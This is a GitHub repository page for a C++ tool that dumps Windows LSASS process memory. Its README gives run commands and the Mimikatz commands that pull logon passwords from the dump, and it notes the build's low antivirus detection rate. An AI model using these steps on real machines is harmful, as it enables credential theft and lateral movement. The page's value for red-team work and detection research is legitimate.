Skip to content
/ lsass-dump Public

Simple LSASS Dumper created using C++ as an alternative to using Mimikatz memory dumper

License

BSD-2-Clause license
53 stars 8 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

battleoverflow/lsass-dump

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
Dump
Dump
 
 
.gitignore
.gitignore
 
 
Dump.sln
Dump.sln
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 

Repository files navigation

LSASS Dumper

Simple LSASS Dumper created using C++ as an alternative to using Mimikatz memory dumper.

NOTE: You still need Mimikatz installed to read the dumped data. This program only dumps the data.

VirusTotal Scan Results: 2/71 when running against the executable build (For personal/experimental use only)

Usage

The easiest way to build the executable is to just run the Dump.cpp file in Visual Studio, but if you prefer g++, that should work too.

After compiling the code into an executable, run it!

You can run the executable either way:

> ./Dump.exe
or
> ./Dump.exe Output.txt

NOTE: If no argument is specified, your file will be HOSTNAME_M_D_YYYY.txt

Here are the commands you will need to use in Mimikatz to access the dumped data:

> mimikatz # This will start the program
mimikatz$ sekurlsa::minidump <FileName>
mimikatz$ sekurlsa::logonPasswords

About

Simple LSASS Dumper created using C++ as an alternative to using Mimikatz memory dumper

Resources

Readme

License

BSD-2-Clause license
Activity

Stars

53 stars

Watchers

2 watching

Forks

8 forks
Report repository

Releases

No releases published

Sponsor this project

  •  
Learn more about GitHub Sponsors

Packages

No packages published

Languages